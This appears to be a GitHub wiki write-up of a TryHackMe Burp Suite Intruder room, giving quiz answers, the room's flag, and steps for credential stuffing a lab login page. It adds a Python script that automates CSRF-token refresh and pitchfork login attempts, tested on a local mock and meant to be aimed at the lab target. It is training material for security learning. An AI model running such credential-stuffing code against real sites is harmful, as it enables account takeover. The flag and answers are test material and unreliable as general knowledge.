THM Burp Suite: Intruder - grunt92/IT-Sec-WriteUps GitHub Wiki

Introduction Room Outline

Deploy the machine!
You should also deploy the AttackBox (using the "Start AttackBox" button at the top of the page) if you are not using your own attack VM.

No answer needed

Intruder What is Intruder?

Which section of the Options sub-tab allows you to control what information will be captured in the Intruder results?

Attack Results

In which Intruder sub-tab can we define the "Attack type" for our planned attack?

Positions

Intruder Positions

Have a play around with the positions selector. Make sure that you are comfortable with the processes of adding, clearing, and automatically selecting positions.

No answer needed

Clear all selected positions.

No answer needed

Select the value of the "Host" header and add it as a position.

No answer needed

Clear this position, then click the "Auto" button again to reselect the default positions.
Your editor should be back looking like it did in the first screenshot of this task.

No answer needed

Attack Types Introduction

Read the Attack Types Introduction.

No answer needed

Attack Types Sniper

If you were using Sniper to fuzz three parameters in a request, with a wordlist containing 100 words, how many requests would Burp Suite need to send to complete the attack?

300

How many sets of payloads will Sniper accept for conducting an attack?

1

Sniper is good for attacks where we are only attacking a single parameter, aye or nay?

aye

Attack Types Battering Ram

As a hypothetical question: you need to perform a Battering Ram Intruder attack on the example request above.
If you have a wordlist with two words in it (admin and Guest) and the positions in the request template look like this:
username=§pentester§&password=§Expl01ted§
What would the body parameters of the first request that Burp Suite sends be?

username=admin&password=admin

Attack Types Pitchfork

What is the maximum number of payload sets we can load into Intruder in Pitchfork mode?

20

Attack Types Cluster Bomb

We have three payload sets. The first set contains 100 lines; the second contains 2 lines; and the third contains 30 lines.
How many requests will Intruder make using these payload sets in a Cluster Bomb attack?

6000
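To make the request arithmetic behind the four attack types concrete, here is an added Python example (it is not part of the room or of this writeup) that expands a Burp-style request template with § markers into the request bodies each attack type would send. Sniper replaces one position at a time with its single payload set, Battering Ram puts the same payload in every position, Pitchfork walks the sets in parallel and stops at the shortest, and Cluster Bomb tries every combination. The helper names and the sample templates are my own; the "pentester"/"Expl01ted" template is the one from the Battering Ram question above.

```python
import itertools
from math import prod

MARKER = "§"   # Burp marks payload positions with section signs


def split_template(template, marker=MARKER):
    """Split 'username=§pentester§&password=§Expl01ted§' into the literal text
    around the positions and the default value inside each position."""
    parts = template.split(marker)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced payload markers in template")
    literals, defaults = parts[0::2], parts[1::2]
    return literals, defaults


def render(literals, values):
    """Interleave literal chunks with the values chosen for each position."""
    out = literals[0]
    for value, literal in zip(values, literals[1:]):
        out += value + literal
    return out


def sniper(template, payloads):
    """One payload set; each position is fuzzed in turn while the others keep
    their default value. Requests = positions x len(payloads)."""
    literals, defaults = split_template(template)
    for i in range(len(defaults)):
        for payload in payloads:
            values = list(defaults)
            values[i] = payload
            yield render(literals, values)


def battering_ram(template, payloads):
    """One payload set; the same payload goes into every position at once.
    Requests = len(payloads)."""
    literals, defaults = split_template(template)
    for payload in payloads:
        yield render(literals, [payload] * len(defaults))


def pitchfork(template, *payload_sets):
    """One payload set per position, iterated in lock-step (line 1 with line 1,
    line 2 with line 2, ...). Requests = size of the smallest set."""
    literals, defaults = split_template(template)
    if len(payload_sets) != len(defaults):
        raise ValueError("pitchfork needs exactly one payload set per position")
    for combo in zip(*payload_sets):
        yield render(literals, combo)


def cluster_bomb(template, *payload_sets):
    """One payload set per position, every combination tried.
    Requests = product of the set sizes."""
    literals, defaults = split_template(template)
    if len(payload_sets) != len(defaults):
        raise ValueError("cluster bomb needs exactly one payload set per position")
    for combo in itertools.product(*payload_sets):
        yield render(literals, combo)


def request_count(attack, positions, *set_sizes):
    """The closed-form request count Intruder will report for each attack type."""
    if attack == "sniper":
        return positions * set_sizes[0]
    if attack == "battering_ram":
        return set_sizes[0]
    if attack == "pitchfork":
        return min(set_sizes)
    if attack == "cluster_bomb":
        return prod(set_sizes)
    raise ValueError(f"unknown attack type {attack!r}")


if __name__ == "__main__":
    template = "username=§pentester§&password=§Expl01ted§"
    print(next(battering_ram(template, ["admin", "Guest"])))   # username=admin&password=admin
    words = [f"word{i}" for i in range(100)]
    print(len(list(sniper("a=§1§&b=§2§&c=§3§", words))))      # 300
```

Running the file with no arguments prints the two answers from the questions above; the generators are lazy, so the 6000-request Cluster Bomb case costs nothing until you iterate it.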

Intruder Payloads

Which payload type lets us load a list of words into a payload set?

Simple List

Which Payload Processing rule could we use to add characters at the end of each payload in the set?

Add suffix

Practical Example

Download and unzip the BastionHostingCreds.zip zipfile. It doesn't matter whether you do this by clicking the download link in the task or by using the files hosted on your deployed machine.

No answer needed

These contain lists of leaked emails, usernames, and passwords, respectively. The last list contains the combined email and password lists.
We will be using the usernames.txt and passwords.txt lists.

No answer needed

Activate the Burp Proxy and try to log in, catching the request in your proxy.

No answer needed

Send the request from the Proxy to Intruder by right-clicking and selecting "Send to Intruder" or by using the Ctrl + I shortcut.

No answer needed

Looking in the "Positions" sub-tab, we should see that auto-selection has chosen the username and password parameters, so we don't need to do anything else in terms of defining our positions. If you have already visited certain other pages on the site, then you may have a session cookie. If so, this will also be selected -- make sure to clear your positions and select only the username and password fields if this happens to you.
We also need the Attack type to be "Pitchfork":

No answer needed

Although these aren't named, we know from the fact that the username field is to the left of the password field that the first position will be for usernames, and the second position will be for passwords.
We can leave both of these as the "Simple list" payload type.
In the first payload set, go to "Payload Options", choose "Load", then select our list of usernames.
Do the same thing for the second payload set and the list of passwords.

We have done all we need to do for this very simple attack, so go ahead and click the "Start Attack" button. A warning about the rate-limiting in Burp Community will appear. Click "Ok" and start the attack!

No answer needed

Every response comes back with the same status code (a 302 redirect), so sort the results by the Length column instead. Once we have sorted our results, one request should stand out as being different: the successful login is the one with a noticeably different response length.

No answer needed

Well done, you have successfully bruteforced the support login page with a credential stuffing attack!

No answer needed

Practical Challenge

Which attack type is best suited for this task?

sniper

You should find that at least five tickets will be returned with a status code of 200, indicating that they exist.

No answer needed

What is the flag?

THM{MTMxNTg5NTUzMWM0OWRlYzUzMDVjMzJl}

Extra Mile

Navigate to http://10.10.182.68/admin/login/.
Activate the Burp Proxy and attempt to log in. Capture the request and send it to Intruder.

No answer needed

Configure the positions the same way as we did for bruteforcing the support login.

No answer needed

Now switch over to the Payloads sub-tab and load in the same username and password wordlists we used for the support login attack.
Up until this point, we have configured Intruder in almost the same way as our previous credential stuffing attack; this is where things start to get more complicated.

No answer needed

There are a lot of steps here, comparatively speaking, so the following GIF shows the entire process:

No answer needed

Again, here is a GIF showing these steps of the process:

No answer needed

The following GIF demonstrates this final stage of the process:

No answer needed

Click "Ok", and we're done!

No answer needed

You should now have a macro defined that will substitute in the CSRF token and session cookie. All that's left to do is switch back to Intruder and start the attack!

No answer needed

As with the support login credential stuffing attack we carried out, the response codes here are all the same (302 Redirects). Once again, order your responses by Length to find the valid credentials. Your results won't be quite as clear-cut as last time -- you will see quite a few different response lengths: however, the response that indicates a successful login should still stand out as being quite significantly shorter.

No answer needed
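The macro steps above are only shown as GIFs in the room, so here is an added Python example (not part of the room or of this writeup) that reproduces what the macro does: before every Pitchfork request it fetches the login page, takes the fresh CSRF cookie and hidden token, and only then submits the credential pair, refusing to follow redirects so the raw status and length are visible, as in Intruder. It runs entirely offline against a hypothetical mock server that stands in for http://10.10.182.68/admin/login/; the cookie name `csrftoken`, the field name `csrfmiddlewaretoken`, the wordlists and the valid pair are all constructed assumptions, not values from the room. The mock accepts each token only once, which is what makes a captured-and-replayed token fail (403) and is the failure mode the macro exists to avoid.

```python
import re
import secrets
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import parse, request
from urllib.error import HTTPError

# Constructed wordlists standing in for usernames.txt / passwords.txt; Pitchfork
# pairs them line by line, so only index 1 forms a valid pair against the mock.
USERNAMES = ["admin", "m.rivera", "support"]
PASSWORDS = ["password1", "Winter2021!", "letmein"]
VALID = ("m.rivera", "Winter2021!")      # constructed, not the room's credentials
_ISSUED = set()                           # tokens the mock server has handed out


class MockAdminLogin(BaseHTTPRequestHandler):
    """Hypothetical stand-in for /admin/login/: double-submit CSRF, where the
    'csrftoken' cookie must match the hidden 'csrfmiddlewaretoken' field."""

    def log_message(self, *args):         # keep the demo quiet
        pass

    def do_GET(self):
        token = secrets.token_hex(16)
        _ISSUED.add(token)
        body = (b'<form method="post"><input type="hidden" name="csrfmiddlewaretoken" value="'
                + token.encode() + b'"><input name="username"><input name="password"></form>')
        self.send_response(200)
        self.send_header("Set-Cookie", f"csrftoken={token}; Path=/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        form = dict(parse.parse_qsl(self.rfile.read(int(self.headers["Content-Length"])).decode()))
        jar = SimpleCookie(self.headers.get("Cookie", ""))
        cookie_token = jar["csrftoken"].value if "csrftoken" in jar else None
        if cookie_token not in _ISSUED or form.get("csrfmiddlewaretoken") != cookie_token:
            status, body = 403, b"CSRF verification failed. Request aborted."
        elif (form.get("username"), form.get("password")) == VALID:
            status, body = 302, b""                       # success: bare redirect, shortest response
        else:
            status, body = 302, b"Invalid username or password, please try again."
        _ISSUED.discard(cookie_token)     # single use: a replayed token is rejected next time
        self.send_response(status)
        if status == 302:
            self.send_header("Location", "/admin/" if not body else "/admin/login/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


class _NoRedirect(request.HTTPRedirectHandler):
    """Do not follow 302s: Intruder shows the status and length of the first response."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = request.build_opener(_NoRedirect)


def fetch_token(login_url):
    """The macro: GET the login page, return (Cookie header value, hidden CSRF token)."""
    with _OPENER.open(login_url) as resp:
        cookie = resp.headers.get("Set-Cookie", "").split(";", 1)[0]
        match = re.search(r'name="csrfmiddlewaretoken" value="([^"]+)"', resp.read().decode())
    if not cookie or not match:
        raise RuntimeError("login page did not hand out a CSRF cookie/token")
    return cookie, match.group(1)


def post_login(login_url, cookie, token, username, password):
    """Submit one credential pair; returns (status, body length) like Intruder's results table."""
    data = parse.urlencode({"csrfmiddlewaretoken": token,
                            "username": username, "password": password}).encode()
    req = request.Request(login_url, data=data, headers={"Cookie": cookie})
    try:
        with _OPENER.open(req) as resp:
            return resp.status, len(resp.read())
    except HTTPError as err:              # 302 and 403 land here because we refuse to redirect
        return err.code, len(err.read())


def try_login(login_url, username, password):
    """One Intruder request with the macro applied: fresh cookie/token, then the POST."""
    cookie, token = fetch_token(login_url)
    return post_login(login_url, cookie, token, username, password)


def stale_token_status(login_url):
    """Without the macro the captured token is replayed; the second POST is rejected."""
    cookie, token = fetch_token(login_url)
    post_login(login_url, cookie, token, USERNAMES[0], PASSWORDS[0])
    return post_login(login_url, cookie, token, USERNAMES[1], PASSWORDS[1])[0]


def pitchfork_stuff(login_url, usernames, passwords):
    """Pitchfork: line i of the username list is paired with line i of the password list."""
    return [(u, p, *try_login(login_url, u, p)) for u, p in zip(usernames, passwords)]


def shortest_response(results):
    """Order by Length as the room does; the successful login is the shortest outlier."""
    return min(results, key=lambda r: r[3])


def run_demo():
    """Start the mock, run the attack, and return (all results, winner, replayed-token status)."""
    server = HTTPServer(("127.0.0.1", 0), MockAdminLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        login_url = f"http://127.0.0.1:{server.server_address[1]}/admin/login/"
        results = pitchfork_stuff(login_url, USERNAMES, PASSWORDS)
        return results, shortest_response(results), stale_token_status(login_url)
    finally:
        server.shutdown()


if __name__ == "__main__":
    results, winner, stale = run_demo()
    for row in sorted(results, key=lambda r: r[3]):
        print(row)
    print("valid pair:", winner[:2], "| replayed token gave status", stale)
```

Every row comes back 302, so the status column is useless here; only the Length column separates the valid pair, which is why the room tells you to order by Length. Against the real target, swap the mock for the room's URL and point `USERNAMES`/`PASSWORDS` at the downloaded lists; the token and cookie names will need to match whatever the real login form uses.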

Use the credentials you just found to log in (you may need to refresh the login page before entering the credentials).

No answer needed

Conclusion Conclusion

I can use Intruder!

No answer needed

[Bonus Question -- Optional] Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.

No answer needed
